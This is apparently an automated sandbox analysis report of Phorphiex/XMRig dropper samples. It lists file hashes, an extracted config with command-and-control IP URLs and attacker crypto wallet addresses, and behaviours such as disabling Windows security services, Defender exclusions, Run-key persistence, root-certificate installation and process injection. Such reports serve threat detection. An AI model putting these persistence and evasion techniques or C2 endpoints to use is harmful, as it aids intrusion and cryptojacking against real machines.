Resubmissions
02-09-2024 02:19
240902-crxs1syfmm 1007-07-2024 21:02
240707-zvllgsyaqp 1001-07-2024 21:37
240701-1gjemsverk 10Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
02-09-2024 02:19
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
New Text Document mod.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
New Text Document mod.exe
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
New Text Document mod.exe
Resource
win10v2004-20240802-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
phorphiex
http://185.215.113.66/
http://77.91.77.92/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
LLeT2zkStY3cvxMBFhoWXkG5VuZPoezduv
rwc4LVd9ABpULQ1CuCpDkgX2xVB1fUijyb
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw
bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
-
mutex
x66x54x66x
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Signatures
-
Modifies security service 2 TTPs 3 IoCs
Processes:
sysmablsvr.exesyslyqdvr.exesysarddrvs.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysarddrvs.exe -
Phorphiex payload 3 IoCs
Processes:
resource yara_rule behavioral1/files/0x000e000000016d55-59.dat family_phorphiex behavioral1/files/0x0007000000016d71-68.dat family_phorphiex behavioral1/files/0x000500000001a4cf-227.dat family_phorphiex -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
2153218424.exewupgrdsv.exedescription pid Process procid_target PID 952 created 1288 952 2153218424.exe 21 PID 952 created 1288 952 2153218424.exe 21 PID 556 created 1288 556 wupgrdsv.exe 21 PID 556 created 1288 556 wupgrdsv.exe 21 -
Processes:
sysarddrvs.exesysmablsvr.exesyslyqdvr.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" syslyqdvr.exe -
XMRig Miner payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/556-156-0x000000013F5D0000-0x000000013FB46000-memory.dmp xmrig behavioral1/memory/292-158-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/292-159-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/292-160-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/292-230-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/292-292-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/292-324-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 2956 powershell.exe 952 powershell.exe 2344 powershell.exe 1360 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 26 IoCs
Processes:
11.exet2.exesysarddrvs.exesysmablsvr.exe2099720541.exe1043721763.exe2153218424.exe2407723126.exe1874524250.exewupgrdsv.exe2020.exet1.exe2020.exetpeinf.exe342012984.exeExplorer.EXEsyslyqdvr.exe407416843.exefile.exe606615764.exewinn.exe1.exem.exeupdater.exeupdater.exe4434.exepid Process 2748 11.exe 2776 t2.exe 808 sysarddrvs.exe 2304 sysmablsvr.exe 2532 2099720541.exe 1048 1043721763.exe 952 2153218424.exe 1916 2407723126.exe 2228 1874524250.exe 556 wupgrdsv.exe 2744 2020.exe 2004 t1.exe 2620 2020.exe 2916 tpeinf.exe 1804 342012984.exe 1288 Explorer.EXE 2200 syslyqdvr.exe 2868 407416843.exe 2452 file.exe 848 606615764.exe 2140 winn.exe 5468 1.exe 5544 m.exe 5600 updater.exe 5684 updater.exe 5904 4434.exe -
Loads dropped DLL 37 IoCs
Processes:
4363463463464363463463463.exesysarddrvs.exesysmablsvr.exe2099720541.exetaskeng.exe2020.exe2020.exetpeinf.exesyslyqdvr.exeWerFault.exeupdater.exeupdater.exepid Process 2500 4363463463464363463463463.exe 2500 4363463463464363463463463.exe 2500 4363463463464363463463463.exe 2500 4363463463464363463463463.exe 808 sysarddrvs.exe 2304 sysmablsvr.exe 2532 2099720541.exe 808 sysarddrvs.exe 2304 sysmablsvr.exe 2232 taskeng.exe 2500 4363463463464363463463463.exe 2500 4363463463464363463463463.exe 2500 4363463463464363463463463.exe 2744 2020.exe 2500 4363463463464363463463463.exe 2620 2020.exe 2916 tpeinf.exe 2916 tpeinf.exe 2200 syslyqdvr.exe 2500 4363463463464363463463463.exe 2200 syslyqdvr.exe 2500 4363463463464363463463463.exe 2500 4363463463464363463463463.exe 2500 4363463463464363463463463.exe 5508 WerFault.exe 5508 WerFault.exe 5508 WerFault.exe 5508 WerFault.exe 5508 WerFault.exe 2500 4363463463464363463463463.exe 2500 4363463463464363463463463.exe 2500 4363463463464363463463463.exe 5612 5600 updater.exe 5684 updater.exe 2500 4363463463464363463463463.exe 2500 4363463463464363463463463.exe -
Processes:
syslyqdvr.exesysarddrvs.exesysmablsvr.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysarddrvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" syslyqdvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" syslyqdvr.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
11.exet2.exe342012984.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysarddrvs.exe" 11.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe" t2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syslyqdvr.exe" 342012984.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
wupgrdsv.exefile.exedescription pid Process procid_target PID 556 set thread context of 292 556 wupgrdsv.exe 63 PID 2452 set thread context of 2384 2452 file.exe 85 -
Drops file in Windows directory 6 IoCs
Processes:
11.exet2.exe342012984.exedescription ioc Process File opened for modification C:\Windows\sysarddrvs.exe 11.exe File created C:\Windows\sysmablsvr.exe t2.exe File opened for modification C:\Windows\sysmablsvr.exe t2.exe File created C:\Windows\syslyqdvr.exe 342012984.exe File opened for modification C:\Windows\syslyqdvr.exe 342012984.exe File created C:\Windows\sysarddrvs.exe 11.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 2024 sc.exe 572 sc.exe 744 sc.exe 1952 sc.exe 2844 sc.exe 2040 sc.exe 2968 sc.exe 2140 sc.exe 2372 sc.exe 580 sc.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x000a000000016dc6-163.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 27 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exe2099720541.execmd.exesc.exefile.exet2.exe342012984.exe11.exesysmablsvr.exesc.exesc.exesc.exepowershell.execmd.exe4363463463464363463463463.exepowershell.exesc.exesysarddrvs.exesc.exesc.exetpeinf.exesc.exesc.exeRegAsm.exesc.exesyslyqdvr.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2099720541.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language t2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 342012984.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysmablsvr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysarddrvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tpeinf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language syslyqdvr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Processes:
4363463463464363463463463.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 4363463463464363463463463.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 2016 schtasks.exe 2092 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exe2153218424.exepowershell.exewupgrdsv.exepowershell.exepowershell.exewinn.exepid Process 2956 powershell.exe 952 2153218424.exe 952 2153218424.exe 1360 powershell.exe 952 2153218424.exe 952 2153218424.exe 556 wupgrdsv.exe 556 wupgrdsv.exe 2344 powershell.exe 556 wupgrdsv.exe 556 wupgrdsv.exe 952 powershell.exe 2140 winn.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
sysmablsvr.exesyslyqdvr.exepid Process 2304 sysmablsvr.exe 2200 syslyqdvr.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
4363463463464363463463463.exepowershell.exepowershell.exepowershell.exenotepad.exepowershell.exeRegAsm.exewinn.exedescription pid Process Token: SeDebugPrivilege 2500 4363463463464363463463463.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeDebugPrivilege 1360 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeLockMemoryPrivilege 292 notepad.exe Token: SeLockMemoryPrivilege 292 notepad.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeBackupPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeDebugPrivilege 2140 winn.exe Token: SeBackupPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeDebugPrivilege 2140 winn.exe Token: SeBackupPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe Token: SeSecurityPrivilege 2384 RegAsm.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
notepad.exepid Process 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
notepad.exepid Process 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe 292 notepad.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.exe11.exet2.exesysarddrvs.execmd.execmd.exesysmablsvr.exe2099720541.exedescription pid Process procid_target PID 2500 wrote to memory of 2748 2500 4363463463464363463463463.exe 31 PID 2500 wrote to memory of 2748 2500 4363463463464363463463463.exe 31 PID 2500 wrote to memory of 2748 2500 4363463463464363463463463.exe 31 PID 2500 wrote to memory of 2748 2500 4363463463464363463463463.exe 31 PID 2500 wrote to memory of 2776 2500 4363463463464363463463463.exe 32 PID 2500 wrote to memory of 2776 2500 4363463463464363463463463.exe 32 PID 2500 wrote to memory of 2776 2500 4363463463464363463463463.exe 32 PID 2500 wrote to memory of 2776 2500 4363463463464363463463463.exe 32 PID 2748 wrote to memory of 808 2748 11.exe 34 PID 2748 wrote to memory of 808 2748 11.exe 34 PID 2748 wrote to memory of 808 2748 11.exe 34 PID 2748 wrote to memory of 808 2748 11.exe 34 PID 2776 wrote to memory of 2304 2776 t2.exe 35 PID 2776 wrote to memory of 2304 2776 t2.exe 35 PID 2776 wrote to memory of 2304 2776 t2.exe 35 PID 2776 wrote to memory of 2304 2776 t2.exe 35 PID 808 wrote to memory of 1092 808 sysarddrvs.exe 36 PID 808 wrote to memory of 1092 808 sysarddrvs.exe 36 PID 808 wrote to memory of 1092 808 sysarddrvs.exe 36 PID 808 wrote to memory of 1092 808 sysarddrvs.exe 36 PID 808 wrote to memory of 2908 808 sysarddrvs.exe 38 PID 808 wrote to memory of 2908 808 sysarddrvs.exe 38 PID 808 wrote to memory of 2908 808 sysarddrvs.exe 38 PID 808 wrote to memory of 2908 808 sysarddrvs.exe 38 PID 1092 wrote to memory of 2956 1092 cmd.exe 40 PID 1092 wrote to memory of 2956 1092 cmd.exe 40 PID 1092 wrote to memory of 2956 1092 cmd.exe 40 PID 1092 wrote to memory of 2956 1092 cmd.exe 40 PID 2908 wrote to memory of 2372 2908 cmd.exe 41 PID 2908 wrote to memory of 2372 2908 cmd.exe 41 PID 2908 wrote to memory of 2372 2908 cmd.exe 41 PID 2908 wrote to memory of 2372 2908 cmd.exe 41 PID 2908 wrote to memory of 2040 2908 cmd.exe 42 PID 2908 wrote to memory of 2040 2908 cmd.exe 42 PID 2908 wrote to memory of 2040 2908 cmd.exe 42 PID 2908 wrote to memory of 2040 2908 cmd.exe 42 PID 2908 wrote to memory of 2968 2908 cmd.exe 43 PID 2908 wrote to memory of 2968 2908 cmd.exe 43 PID 2908 wrote to memory of 2968 2908 cmd.exe 43 PID 2908 wrote to memory of 2968 2908 cmd.exe 43 PID 2908 wrote to memory of 2140 2908 cmd.exe 44 PID 2908 wrote to memory of 2140 2908 cmd.exe 44 PID 2908 wrote to memory of 2140 2908 cmd.exe 44 PID 2908 wrote to memory of 2140 2908 cmd.exe 44 PID 